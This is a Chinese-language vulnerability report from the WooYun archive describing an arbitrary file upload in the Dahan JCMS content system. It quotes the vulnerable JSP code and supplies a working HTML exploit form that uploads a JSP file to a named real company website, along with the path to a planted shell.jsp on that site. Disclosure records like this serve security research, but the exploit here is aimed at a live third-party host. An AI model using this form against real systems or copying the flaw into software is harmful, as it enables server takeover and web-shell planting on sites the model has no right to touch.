乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-09: 细节已通知厂商并且等待厂商处理中 2014-09-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-11-04: 细节向核心白帽子及相关领域专家公开 2014-11-14: 细节向普通白帽子公开 2014-11-24: 细节向实习白帽子公开 2014-12-05: 细节向公众公开
大汉版通系统无限制getshell
该文件上传发生在:/jcms/m_5_e/module/idea/opr_import_discussion.jsp核心代码如下:
<% ListTable listtable = new ListTable(request); out.println(listtable.getListTableCssJs()); sys.initSysPara(request); String strBillStatus = Convert.getParameter(request,"fn_billstatus","A"); jcms.entity.Merp_Pub_UserEntity userentity = UserRightBLF.getUserInfo(request); int typeid = Convert.getParameterInt(request,"typeid",0); /*定义变量、取表单值*/ String strTpl_fn_billstatus = "S"; /*保存、更新模板 -- 新增S或者更新B*/ if (strBillStatus.equals("S")){ String strFilePath = application.getRealPath("") + "/jcms_files/jcms"+sys.appId+"/web"+sys.webId+"/site/module/idea/tem/upload/"; Convert.createDirectory(strFilePath); CommonUploadFile upload = new CommonUploadFile(strFilePath, ""); boolean bl = false; String[] strFiles = null; try { bl = upload.uploadFile(request); } catch (Exception e) { } String ext = upload.getFormValue("ext");//得到上传文件的格式 if(bl){ ColumnParse cp = new ColumnParse( sys.appId,sys.webId ); cp.setUserentity( userentity ); String strXMLFile = ""; strFiles = upload.getAllFileName(); TopicBLF blf=new TopicBLF(sys.appId,sys.webId); if( strFiles != null ){ for(int i=0;i<strFiles.length;i++){ strXMLFile = strFilePath + strFiles[i]; blf.doImport(strXMLFile,typeid,userentity.getVc_username()); } } } String strAlter = " top.buttomFrame.right_frame.location.href='./que_discussion.jsp?typeid="+typeid+"';\n" + "top.buttomFrame.left_frame.location.reload();\n" + "removeTB();\n"; out.println( Convert.getAlterScript( strAlter ) ); return; }%>
通过 String ext = upload.getFormValue("ext");//得到上传文件的格式 获取上传的格式,但这个完全可控。所以造成了任意文件上传
漏洞利用:将如下代码保存为htm
<form action="http://sha.sinotrans.com/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S" method="POST" ENCTYPE="multipart/form-data"> <input type="hidden" name="typeid" value="0"> <input type="hidden" name="fn_billstatus" value="S"> <input type="hidden" name="ext" value="jsp"> <input type="file" name="file1" /> <input type="submit" value="Upload" id="editbutton"/></form>Path : /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+uploadname
打开便可直接上传任意的文件,文件上传后,路径为:
/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+你上传的文件名
采用http://sha.sinotrans.com网站进行漏洞利用证明:
http://sha.sinotrans.com/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/shell.jsp
如图 :
严格限制文件上传的格式
危害等级:无影响厂商忽略
忽略时间:2014-12-05 19:16
暂无